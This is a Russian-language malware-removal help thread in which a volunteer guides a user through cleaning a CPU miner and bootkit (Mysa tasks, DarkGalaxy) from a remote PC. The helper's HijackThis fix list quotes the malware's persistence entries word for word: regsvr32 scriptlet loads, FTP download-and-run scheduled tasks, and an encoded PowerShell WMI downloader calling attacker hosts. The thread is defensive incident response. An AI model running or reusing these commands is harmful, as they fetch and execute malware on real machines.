Убрать остатки остатки автозагружаемого обезвреженного CPU-майнера (conhost, lmsosee, mysa1-3)

[ramzeka]

Доброго времени суток.

Возникала проблема с компьютером на удалёнке, по аналогии с темами здесь и здесь.

На первых порах вирусня ликвидировала беззащитный бесплатный avast, службы создания точек отката и убрала возможность установить антивирус в принципе, не говоря о том, что в фоне создавала серьезную нагрузку на ЦП.

Ликвидировать при при помощи cureIT/KVRT было бесполезно - восстановление вируса происходило после очередного перезапуска (через автозагрузку, реестр, планировщик коннектится к ftp за скриптом-установщиком вирусни). Чудным образом удалось восстановить Центр Обновления Windows и накатить заплатку, через которую осуществлялся майнинг. Загрузка на ЦП пропала, однако остались всё также в планировщике, реестре и автозагрузке строки коннектов к ftp, которые при помощи доверенных утилит с различных форумов помощи были тоже стерты, но, сдается мне, что не все строки вручную удалось обнаружить собственными силами, так как всё равно появляются conhost, lsmosee, mysa1-3 в тех же самых местах.

Дабы не использовать автоматические скрипты по удалению, предназначенные для других пользователей, создаю свою тему.
Напомню только, что единственный доступ к компьютеру - удалённый.

[Info_bot]

Уважаемый(ая) ramzeka, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[ramzeka]

Анализ провел, логи прикрепил.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2019/01/17) - {aa8de756-2896-49df-81a9-b0ec1480a4ca} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

[ramzeka]

При помощи Autologger пофиксил.
TDSKiller'ом прогнал. Логи во вложении.

После перезагрузки вновь хватает Rootkit.Boot.DarkGalaxy.a:
16:38:16.0757 0x0524 \Device\Harddisk0\DR0\# - copied to quarantine
16:38:16.0757 0x0524 \Device\Harddisk0\DR0 - copied to quarantine
16:38:16.0822 0x0524 \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - will be cured on reboot
16:38:16.0827 0x0524 \Device\Harddisk0\DR0 - ok
16:38:16.0827 0x0524 \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - User select action: Cure
16:38:17.0027 0x0524 KLMD registered as C:\Windows\system32\drivers\39541415.sys

Не может MBR-ку изменить, либо после ребута что-то меняет её по новой.

[Vvvyg]

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
Если образ не влезет во вложения - загрузите в доступное облачное хранилище или на файлообменник (желательно, без капчи и излишней рекламы) и дайте ссылку.

Затем лечите TDSSKiller'ом без подключения в интернет,пофиксите снова в HijackThis всё, что будет из сообщения #4.
По возможности не подключайтесь к интернету на проблемной машине до полного излечения. Не получится - дам рекомендации по UVS по образу автозапуска.

[ramzeka]

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
Если образ не влезет во вложения - загрузите в доступное облачное хранилище или на файлообменник (желательно, без капчи и излишней рекламы) и дайте ссылку.

Как раз uVS'ом и пользовался в прошлый раз, но, видимо, что-то еще осталось.
Ссылка на образ: DropMeFiles

Затем лечите TDSSKiller'ом без подключения в интернет,пофиксите снова в HijackThis всё, что будет из сообщения #4.
По возможности не подключайтесь к интернету на проблемной машине до полного излечения. Не получится - дам рекомендации по UVS по образу автозапуска.

Сделаю, конечно, но машина на удалёнке, повторюсь, поэтому пока что не получится без интернета.

[Vvvyg]

Тогда печально... Там, похоже, буткит подгружает прочие компоненты и наоборот.
Попробуйте пролечить KVRT, может, справится.

[ramzeka]

Тогда печально... Там, похоже, буткит подгружает прочие компоненты и наоборот.
Попробуйте пролечить KVRT, может, справится.

Ну что ж, после вышеописанных действий (TDSKiller+uVS+HiJackThis) полёт нормальный.

После перезагрузки TDSKiller ничего не нашел.
uVS нашел строчку на подозрительный драйвер, но без самого файла.
HiJackThis больше не находит те строки, которые вы сказали удалить.

Сейчас проведу полную проверку KVRT и сообщу о результатах. Затем, проверю пропал ли запрет на установку антивирусного ПО.

- - - - -Добавлено - - - - -
Vvvyg,
Провел сканирование, KVRT обнаружил еще 59 угроз (в том числе даже находящиеся в карантинных папках uVS/Hijack). После перезагрузки всё также ничего постороннего не находит более. Антивирус установился, проблем более нет.
Заявку можно считать закрытой.
Благодарю за помощь.

[Vvvyg]

Всё-таки образ автозапуска UVS хотелось бы посмотреть, возможно ещё хвосты остались.